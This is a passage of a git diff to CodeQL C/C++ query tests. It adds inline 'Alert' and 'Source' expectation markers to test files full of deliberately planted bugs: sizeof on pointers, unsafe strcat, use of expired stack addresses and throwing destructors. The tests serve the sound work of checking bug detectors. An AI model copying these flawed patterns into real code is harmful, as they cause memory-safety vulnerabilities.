f6(container *s) { container t; - memcpy(&t, s, sizeof(s)); // BAD + memcpy(&t, s, sizeof(s)); // BAD // $ Alert } void f7(container *s) { @@ -55,5 +55,5 @@ class myClass {}; typedef myClass *myClassPtr; void f8(const myClassPtr s[]) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c index ea723e1e0f55..efadee92900b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c @@ -19,7 +19,7 @@ void f(void) { output4[0] = '\0'; strcat(output1, str1); strcat(output2, str1); - strcat(output3, str2); // Bad, as str2 gets reassigned - strcat(output4, str3); // Bad, as str3 gets fiddled with + strcat(output3, str2); // Bad, as str2 gets reassigned // $ Alert + strcat(output4, str3); // Bad, as str3 gets fiddled with // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref index 9790cddebab5..7f1a1cf35f2d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +query: Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected index 858dbea59321..bf50722ec86b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected @@ -1,3 +1,31 @@ +#select +| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | +| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | +| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | +| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | +| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... | test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | +| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... | test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | +| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | +| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | +| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... | test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | +| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... | test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | +| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | +| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | +| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | +| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | +| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... | test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | +| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... | test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | +| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | +| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | +| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | +| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | +| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | edges | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:14:3:14:9 | Call: call to escape1 | | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:19:3:19:9 | Call: call to escape1 | @@ -68,31 +96,3 @@ edges | test.cpp:238:3:238:9 | Call: call to escape2 | test.cpp:239:17:239:17 | Load: p | | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:267:3:267:9 | Call: call to escape3 | | test.cpp:267:3:267:9 | Call: call to escape3 | test.cpp:268:17:268:17 | Load: p | -#select -| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | -| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | -| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | -| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | -| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... | test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | -| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... | test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | -| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | -| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | -| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... | test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | -| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... | test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | -| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | -| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | -| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | -| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | -| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... | test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | -| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... | test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | -| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | -| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | -| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | -| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | -| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref index ce6cdee0d867..4075c6c57983 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/UsingExpiredStackAddress.ql \ No newline at end of file +query: Likely Bugs/Memory Management/UsingExpiredStackAddress.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp index 616305a8174d..14a10769e144 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp @@ -7,12 +7,12 @@ static struct S100 s101; void escape1() { int x; - s101.p = &x; + s101.p = &x; // $ Source } int simple_field_bad() { escape1(); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } int simple_field_good() { @@ -21,7 +21,7 @@ int simple_field_good() { } int deref_p() { - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } int field_indirect_bad() { @@ -49,13 +49,13 @@ int store_argument_value() { } void store_address_of_argument(int y) { - s101.p = &y; + s101.p = &y; // $ Source } int store_argument_address() { int x; store_address_of_argument(x); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } void address_escapes_through_pointer_arith() { @@ -65,12 +65,12 @@ void address_escapes_through_pointer_arith() { int* p2 = p1 - 1; int* p3 = 1 + p2; p3++; - s101.p = p3; + s101.p = p3; // $ Source } int test_pointer_arith_bad() { address_escapes_through_pointer_arith(); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } int test_pointer_arith_good_1() { @@ -90,12 +90,12 @@ int test_pointer_arith_good_2(bool b) { void field_address_escapes() { S100 s; - s101.p = &s.i; + s101.p = &s.i; // $ Source } int test_field_address_escapes() { field_address_escapes(); - return s101.p[0]; // BAD + return s101.p[0]; // BAD // $ Alert } void escape_through_reference() { @@ -103,12 +103,12 @@ void escape_through_reference() { int& r0 = x; int& r1 = r0; r1++; - s101.p = &r1; + s101.p = &r1; // $ Source } int test_escapes_through_reference() { escape_through_reference(); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } struct S300 { @@ -133,53 +133,53 @@ void escape_through_arrays() { int b2[14][15]; int b3[13][14][15]; - s1.p1 = b1; - s2.p1 = &b1[1]; + s1.p1 = b1; // $ Source + s2.p1 = &b1[1]; // $ Source - s1.p2 = b2; - s2.p2 = &b2[1]; - s3.p1 = b2[1]; - s4.p1 = &b2[1][2]; + s1.p2 = b2; // $ Source + s2.p2 = &b2[1]; // $ Source + s3.p1 = b2[1]; // $ Source + s4.p1 = &b2[1][2]; // $ Source - s1.p3 = b3; - s2.p3 = &b3[1]; - s3.p2 = b3[1]; - s4.p2 = &b3[1][2]; - s5.p1 = b3[1][2]; + s1.p3 = b3; // $ Source + s2.p3 = &b3[1]; // $ Source + s3.p2 = b3[1]; // $ Source + s4.p2 = &b3[1][2]; // $ Source + s5.p1 = b3[1][2]; // $ Source s6.p1 = &b3[1][2][3]; - s1.pp[0] = b1; - s2.pp[0] = &b1[1]; - s3.pp[0] = b2[1]; - s4.pp[0] = &b2[1][2]; - s5.pp[0] = b3[1][2]; - s6.pp[0] = &b3[1][2][3]; + s1.pp[0] = b1; // $ Source + s2.pp[0] = &b1[1]; // $ Source + s3.pp[0] = b2[1]; // $ Source + s4.pp[0] = &b2[1][2]; // $ Source + s5.pp[0] = b3[1][2]; // $ Source + s6.pp[0] = &b3[1][2][3]; // $ Source } void test_escape_through_arrays() { escape_through_arrays(); - int x1 = *s1.p1; // BAD - int x2 = *s2.p1; // BAD - - int* x3 = s1.p2[1]; // BAD - int x4 = *s1.p2[1]; // BAD - int* x5 = *s2.p2; // BAD - int* x6 = s3.p1; // BAD - int x7 = *&s4.p1[1]; // BAD - - int x8 = *s1.p3[1][2]; // BAD - int x9 = (*s2.p3[0])[0]; // BAD - int x10 = **s3.p2; // BAD - int x11 = **s4.p2; // BAD - int x12 = (*s4.p1); // BAD - int x13 = s5.p1[1]; // BAD - - int* x14 = s1.pp[0]; // BAD - int x15 = *s2.pp[0]; // BAD - int x16 = *s3.pp[0]; // BAD - int x17 = **s4.pp; // BAD - int x18 = s5.pp[0][0]; // BAD - int x19 = (*s6.pp)[0]; // BAD + int x1 = *s1.p1; // BAD // $ Alert + int x2 = *s2.p1; // BAD // $ Alert + + int* x3 = s1.p2[1]; // BAD // $ Alert + int x4 = *s1.p2[1]; // BAD // $ Alert + int* x5 = *s2.p2; // BAD // $ Alert + int* x6 = s3.p1; // BAD // $ Alert + int x7 = *&s4.p1[1]; // BAD // $ Alert + + int x8 = *s1.p3[1][2]; // BAD // $ Alert + int x9 = (*s2.p3[0])[0]; // BAD // $ Alert + int x10 = **s3.p2; // BAD // $ Alert + int x11 = **s4.p2; // BAD // $ Alert + int x12 = (*s4.p1); // BAD // $ Alert + int x13 = s5.p1[1]; // BAD // $ Alert + + int* x14 = s1.pp[0]; // BAD // $ Alert + int x15 = *s2.pp[0]; // BAD // $ Alert + int x16 = *s3.pp[0]; // BAD // $ Alert + int x17 = **s4.pp; // BAD // $ Alert + int x18 = s5.pp[0][0]; // BAD // $ Alert + int x19 = (*s6.pp)[0]; // BAD // $ Alert } void not_escape_through_arrays() { @@ -231,12 +231,12 @@ static struct S100 s103; void escape2() { int x; s103.p = nullptr; - s103.p = &x; + s103.p = &x; // $ Source } void calls_escape2() { escape2(); - int x = *s103.p; // BAD + int x = *s103.p; // BAD // $ Alert } bool unknown(); @@ -260,10 +260,10 @@ void escape3() { int x; s105.p = nullptr; if(unknown()) { } - s105.p = &x; + s105.p = &x; // $ Source } void calls_escape3() { escape3(); - int x = *s105.p; // BAD + int x = *s105.p; // BAD // $ Alert } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref index 193c84e1ab2a..f29596941a18 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref @@ -1 +1,2 @@ -Likely Bugs/OO/IncorrectConstructorDelegation.ql +query: Likely Bugs/OO/IncorrectConstructorDelegation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp index ce652cabdace..225f3735a416 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp @@ -4,7 +4,7 @@ class MyRect public: MyRect() { - MyRect(100.0f, 100.0f); // BAD + MyRect(100.0f, 100.0f); // BAD // $ Alert } MyRect(float _width, float _height) : width(_width), height(_height) @@ -13,7 +13,7 @@ class MyRect MyRect(float _width) { - MyRect(_width, _width); // BAD + MyRect(_width, _width); // BAD // $ Alert } MyRect(int a) : MyRect(10.0f, 10.0f) // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp index 4b7b61de8cec..2555a6cb842e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp @@ -53,7 +53,7 @@ struct Base_Virtual_VirtualDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtor +struct Base_Virtual_NonVirtualDtor // $ Alert { ~Base_Virtual_NonVirtualDtor(); virtual void VirtualFunction(); @@ -65,7 +65,7 @@ struct Base_Virtual_ImplicitDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtorWithDefinition +struct Base_Virtual_NonVirtualDtorWithDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithDefinition(); virtual void VirtualFunction(); @@ -75,7 +75,7 @@ Base_Virtual_NonVirtualDtorWithDefinition::~Base_Virtual_NonVirtualDtorWithDefin { } -struct Base_Virtual_NonVirtualDtorWithInlineDefinition +struct Base_Virtual_NonVirtualDtorWithInlineDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithInlineDefinition() { diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref index ff3cecfecc72..9ca3f49140ee 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref @@ -1 +1,2 @@ -Likely Bugs/OO/NonVirtualDestructorInBaseClass.ql +query: Likely Bugs/OO/NonVirtualDestructorInBaseClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref index 2b0862fc362d..eee2e41916cd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/ThrowInDestructor.qlref @@ -1 +1,2 @@ -Likely Bugs/OO/ThrowInDestructor.ql +query: Likely Bugs/OO/ThrowInDestructor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp index 247d6d801efd..0574cc47facd 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/ThrowInDestructor/test.cpp @@ -10,7 +10,7 @@ struct ThrowsDirectly { ~ThrowsDirectly() noexcept(false) { if (i == 0) { - throw exception(); // BAD + throw exception(); // BAD // $ Alert } else if (i == 1) { try { @@ -45,14 +45,14 @@ struct ThrowsDirectly { } else if (i == 5) { try { if (i == 5) - throw exception(); // BAD + throw exception(); // BAD // $ Alert } catch (const specific_exception &) { } } else if (i == 6) { try { if (i == 6) - throw exception(); // BAD + throw exception(); // BAD // $ Alert } catch (const other_throwable &) { } } diff --git 